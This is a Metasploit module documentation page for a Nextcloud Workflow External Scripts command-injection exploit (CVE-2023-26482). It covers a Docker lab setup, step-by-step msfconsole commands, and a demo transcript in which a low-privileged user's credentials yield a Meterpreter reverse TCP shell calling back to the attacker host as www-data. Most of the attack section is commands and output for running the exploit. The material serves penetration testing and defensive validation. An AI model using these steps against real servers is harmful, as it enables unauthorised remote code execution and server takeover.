metasploit-gs/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
2025-04-09 11:24:47 +00:00
## Description
This module exploits a command injection that leads to remote code execution in Nextcloud installations where the Workflow External Scripts app is also installed.
The vulnerability affects Nextcloud versions >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0 and >= 25.0.0.
A missing scope validation allowed regular users to create workflows that are designed to be available only to administrators. In combination with Workflow External Script, this vulnerability leads to authenticated remote command execution.
More about the vulnerability details: [CVE-2023-26482](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26482).
The module automatically uses the `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
The module checks whether the target is vulnerable by adding and then removing a dummy workflow.
## Vulnerable Application
[Nextcloud](https://nextcloud.com/) is a suite of client-server software for creating and using file hosting services.
This module has been tested successfully on Nextcloud versions:
* Nextcloud version 24.0.5
### Source and Installers
* [Source Code Repository](https://github.com/nextcloud/server/releases/tag/v24.0.5)
* [Docker](https://hub.docker.com/_/nextcloud)
### Docker Installation
This exploit was tested using a [Nextcloud docker container](https://hub.docker.com/_/nextcloud) and [docker-compose](https://docs.docker.com/compose/)
with the following `docker-compose.yml`:
```yaml
volumes:
  nextcloud:
  db:

services:
  db:
    image: mariadb:10.6
    restart: always
    command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW
    volumes:
      - db:/var/lib/mysql
    environment:
      - MARIADB_ROOT_PASSWORD=root
      - MARIADB_PASSWORD=root
      - MARIADB_DATABASE=nextcloud
      - MARIADB_USER=nextcloud

  app:
    image: nextcloud:24.0.5
    restart: always
    ports:
      - 8080:80
    links:
      - db
    environment:
      - MYSQL_PASSWORD=root
      - MYSQL_DATABASE=nextcloud
      - MYSQL_USER=root
      - MYSQL_HOST=db
      - NEXTCLOUD_ADMIN_PASSWORD=admin
      - NEXTCLOUD_ADMIN_USER=admin
      - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080"
    depends_on:
      - db
```
**_NOTE:_** Change the IP address and port in `NEXTCLOUD_TRUSTED_DOMAINS` to match your setup.
After `docker compose up -d`, log in as admin, install the workflow app "Workflow external script" and
create a low-privileged user `alice`. Make sure that you choose "Cron (Recommended)" under "Background Jobs" in the settings.
Before we can run the exploit, we need to start the cron job. This is crucial because otherwise the
payload does not get triggered:
```
docker exec -it -u www-data nextcloud-app-1 /bin/bash
watch -n2 php cron.php
```
Wait until the `watch` command outputs something like: "Every 2.0s: php cron.php".
## Verification Steps
Example steps in this format (also in the PR):
1. Do: `use exploit/unix/webapp/nextcloud_workflows_rce`
2. Do: `set RHOSTS [ips]`
3. Do: `set LHOST [lhost]`
4. Do: `set RPORT 8080`
5. Do: `set USERNAME alice`
6. Do: `set PASSWORD alice-password`
7. Do: `run`
8. You should get a shell after a while.
## Options
### TARGETURI
Remote web path to the Nextcloud installation (default: `/`).
### USERNAME
The low-privileged username used to authenticate to Nextcloud.
### PASSWORD
The password for the low-privileged user.
## Scenarios
In this scenario the Nextcloud server has the IP address 192.42.0.254. The IP address of the Metasploit host is
192.42.1.188.
### Nextcloud 24.0.5 (docker-compose)
The following demo shows how to use the exploit:
```
msf > use exploit/unix/webapp/nextcloud_workflows_rce
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64
RHOSTS => 192.168.233.64
msf exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117
LHOST => 192.168.233.117
msf exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080
RPORT => 8080
msf exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice
USERNAME => alice
msf exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa
PASSWORD => CaeD4ohchaiv5ieDooBa
msf exploit(unix/webapp/nextcloud_workflows_rce) > run
[*] Started reverse TCP handler on 192.168.233.117:4444
[*] Sending payload..
[+] Workflow created
[*] Waiting for the payload to connect back ..
[*] Sending stage (3045380 bytes) to 192.168.233.64
[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000
[+] Payload connected!
[*] Cleaning up
meterpreter > getuid
Server username: www-data
```
## Limitations
Ensure that the `WfsDelay` advanced option is set to a value that gives `cron` enough time to execute the payload. The default is 16 minutes.